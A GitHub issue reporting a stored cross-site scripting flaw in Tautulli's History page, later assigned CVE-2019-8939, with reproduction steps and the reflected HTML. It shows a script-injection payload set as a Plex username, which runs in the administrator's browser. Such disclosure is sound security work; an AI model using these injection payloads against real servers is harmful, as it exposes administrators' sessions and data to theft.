Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Insufficient username filtering in history.html allows XSS and data exfiltration #161

geeknik opened this issue Feb 19, 2019 · 1 comment


None yet
2 participants
Copy link

commented Feb 19, 2019


What you did?
I changed my Plex username to geeknik"><script src=></script>.

What happened?
Tautulli does not filter out JavaScript when reading usernames and when the admin visits the History page, the JavaScript is executed in the context of said admin.

Lines 112-128 are vulnerable:

Here we can see how it is reflected:

     <select name="history-user" id="history-user" class="btn" style="color: inherit;">
     <option value="">All Users</option>
     <option disabled="">────────────</option>
     <option value="xxx">user1</option><option value="xxx">user2</option><option value="xxx">user3</option><option value="xxx">user4</option><option value="xxx">DomitianX</option><option value="xxx">geeknik"&gt;<script src=""></script></option><option value="xxx">user5</option><option value="xxx">user6</option><option value="xxx">user7</option><option value="xxx">user8</option><option value="0">Local</option><option value="xxx">user9</option><option value="xxx">user10</option><option value="xxx">user11</option><option value="xxx">user12</option><option value="xxx">user13</option><option value="xxx">user14</option><option value="xxx">user15</option><option value="xxx">user16</option><option value="xxx">user17</option></select>

What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.

How can we reproduce your issue?
Setup a Plex Media Server, Install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with JavaScript. Visit the Tautulli History page.


This comment has been minimized.

Copy link

commented Feb 19, 2019

CVE-2019-8939 has been assigned to this flaw by MITRE.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.